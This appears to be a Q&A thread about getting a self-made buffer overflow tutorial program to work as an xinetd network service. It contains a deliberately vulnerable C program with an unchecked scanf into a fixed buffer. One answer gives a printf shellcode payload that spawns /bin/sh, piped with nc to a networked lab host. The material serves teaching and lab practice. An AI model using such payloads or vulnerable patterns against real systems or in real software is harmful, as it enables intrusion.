# Simple buffer overflow via xinetd

Tags: c, buffer-overflow

I'm trying to make a simple buffer overflow tutorial that runs the program below as a service on port 8000 via xinetd. Code was compiled using

```
gcc -o bof bof.c -fno-stack-protector
```

ubuntu has stack protection turned off as well.

Exploiting locally i.e

```
python -c ---snippet--- | ./bof
```

is successful and the hidden function was executed, displaying text file contents.

However, running it as a service and performing

```
python -c ---snippet--- | nc localhost 8000
```

returns nothing when exploiting. Am I missing something here?

```
#include <stdio.h>

void secret()
{
    int c;
    FILE *file;
    file = fopen("congratulations.txt", "r");
    if (file) {
    while ((c= getc(file)) !=EOF)
    putchar(c);
    fclose(file);


}

void textdisplay()
{
    char buffer[56];

    scanf("%s", buffer);
    printf("You entered: %s\n", buffer);
}

int main()
{
    textdisplay();

    return 0;
}
```

Comment: You're missing some analysis that you can do yourself, before asking for help on stackoverflow.com. For example, using strace to verify that xinetd is actually forking off and executing your server process, as expected, and that your server process successfully read()s the exploit.

Answer (score 1):

Output is buffered by default. To disable this you can do the following at the top of main:

```
setbuf(stdin, NULL);
```

This should fix your issue.

Answer (score 0):

This is an issue that I am running into as well. Almost exactly the same.

However, here is one piece that I have found out that might be helpful to you. I believe the issue has something to do with xinetd not executing the binary as a terminal and having job control.

So what I did was to have xinetd do:

```
server = /usr/bin/python
server_args = /opt/shell.py
```

Then within the /opt/shell.py I had:

```
import pty
pty.spawn("/opt/oflow.elf")
```

/opt/oflow.elf being my overflowed binary

When I do this, I can actually send and receive data. Thats when I run the following command via netcat to try and overflow the service remotely:

```
**printf "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80AAAAAAAAAAAAAAAAAAAAAAAAABCDEFGHIJKLMNOPQ\x7c\xfc\xff\xbf" | nc 192.168.1.2 9000**
```

This does nothing. However, I test the local version and it works PERFECTLY.  Works every time.

Not when its being wrapped in a python pty and xinetd.

When I run the xinetd pointing directly to /opt/oflow.elf, I get absolutely nothing back from netcat.

So that doesn't exactly answer your question but it should whittle it down for you.

**UPDATED COMPLETE ANSWER:**

I figured out why this wasnt working. No need to use python at all. After every printf statement you must also include:

```
fflush(stdout);
```

Otherwise, xinetd doesnt know to send the stdout.

You may also need to do this for stdin:

```
fflush(stdin);
```